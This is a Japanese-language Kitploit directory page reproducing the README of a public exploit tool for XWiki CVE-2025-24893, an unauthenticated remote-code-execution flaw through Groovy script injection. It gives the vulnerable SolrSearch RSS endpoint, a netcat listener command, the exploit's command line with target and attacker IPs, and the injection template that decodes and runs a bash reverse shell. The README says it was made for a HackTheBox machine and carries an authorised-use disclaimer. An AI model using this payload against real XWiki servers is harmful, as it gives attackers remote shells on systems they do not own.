Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
xwiki-cve-2025-24893-exploit — XWiki CVE-2025-24893 に対するGroovyスクリプトインジェクション経由の未認証RCEエクスプロイト | Kitploit
ツール/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

XWiki CVE-2025-24893 に対するGroovyスクリプトインジェクション経由の未認証RCEエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

XWiki CVE-2025-24893 エクスプロイト

CVE-2025-24893 の脆弱性がある XWiki バージョン向けの認証不要リモートコード実行エクスプロイト。

脆弱性の概要

XWiki 15.10.9 より前のバージョンは、SolrSearch RSS フィードハンドラにおける Groovy スクリプトインジェクションを通じて、認証不要のリモートコード実行 (RCE) に対して脆弱です。この脆弱性は、XWiki が text パラメータ内のユーザー入力を適切にサニタイズできず、攻撃者が RSS コンテキストから抜け出して任意の Groovy コードを注入できるために存在します。

CVE ID: CVE-2025-24893
CVSS スコア: 9.8 (Critical)
影響を受けるバージョン: XWiki < 15.10.9

特徴

  • シンプルなコマンドラインインターフェース
  • 自動ペイロード生成とエンコーディング
  • 基本的なフィルタをバイパスするための Base64 エンコードされたリバースシェル
  • 最小限の依存関係 (requests ライブラリのみ)

必要条件

root@kitploit:~
pip3 install requests

使用方法

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

例:

root@kitploit:~
# 攻撃側マシンでリスナーを起動
nc -lvnp 9001

# エクスプロイトを実行
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

動作の仕組み

  1. bash リバースシェルコマンドを構築
  2. ペイロードを Base64 エンコード
  3. テンプレートインジェクション (}}}}}}{{{{groovy}}}}) を使用して Groovy コードでラップ
  4. 必要なデリミタを保持しながらペイロードを URL エンコード
  5. GET リクエストを /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> に送信
  6. XWiki が悪意のある RSS フィードを処理し、Groovy コードを実行

概念実証

エクスプロイトは以下のエンドポイントをターゲットにします:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

脆弱性により、RSS フィードコンテキストから抜け出すことが可能です:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

免責事項

このツールは教育目的および許可されたペネトレーションテストの目的にのみ使用されます。作者はこのプログラムの誤用や損害について一切の責任を負いません。このエクスプロイトは、自分が所有するシステム、または明示的なテスト許可があるシステムに対してのみ使用してください。

参考文献

  • XWiki セキュリティアドバイザリ
  • CVE-2025-24893

ライセンス

MIT ライセンス - 詳細は LICENSE ファイルを参照

作者

HTB の「Editor」ボックス向けに作成


注意: システムをテストする前に、必ず適切な承認を得てください。

ツールをダウンロード